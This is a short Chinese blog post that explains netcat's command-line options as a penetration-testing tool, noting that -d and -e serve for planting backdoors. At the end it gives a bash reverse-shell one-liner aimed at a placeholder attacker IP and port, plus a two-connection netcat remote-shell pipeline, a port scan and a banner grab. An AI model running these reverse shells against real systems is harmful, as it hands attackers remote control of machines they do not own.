netcat命令及解释
作为web渗透中的扛把子工具,我们必须掌握灵活使用它,下面我们来了解一下它的命令吧!
netcat
-d
表示脱离命令窗口,在后台运行,常用于后门建立过程
假设监听了一个端口,但是关闭了那个cmd窗口那么nc就不会监听了,加入了-d就会在后台运行
-e
执行某个程序,常用于后门建立过程(cmd. exe、/bin/bash)
-G gateway
设置网关,常用于突破内网限制
-g num
路由跳数
-i sec
设置发送每一行数据的时间间隔(以秒计算)
-l
设置netcat处于监听状太等待连接
-L
设置netcat处于昕状态等待连接,当客户端端口,服务端依旧回到等待状
-n
设置netcar只扫描ip不进行DNS解析
-o file
设置传输十六进制的数据
-p port
设置本地监听的端口了
-r
设置netcat随机化的端口号
-s addr
设置netcat源地址(用于端口扫描上)
-t
回复telnet的请求数据包
-u
设置netcat使用UDP模式(默认是使用TCP协议)
-v
显示详细信息
-w secs
设置连接超时秒数
-z
设置扫描模式,表示发送的数据包中不包含任何payload
服务器(linux)没有netcat,使用bash -i >& /dev/tcp/攻击者ip/攻击者port 0>&1 反弹shell(0表示输入,1表示输出)
nc -nvz ip port扫描端口开放情况
echo "" | nc -vn ip port 显示banner信息
客户端开两个端口,一个输入一个输出
服务器端nc ip 入port | /bin/bash | nc ip 出port
扫描二维码推送至手机访问。
版权声明:本文由零零博客发布,如需转载请注明出处。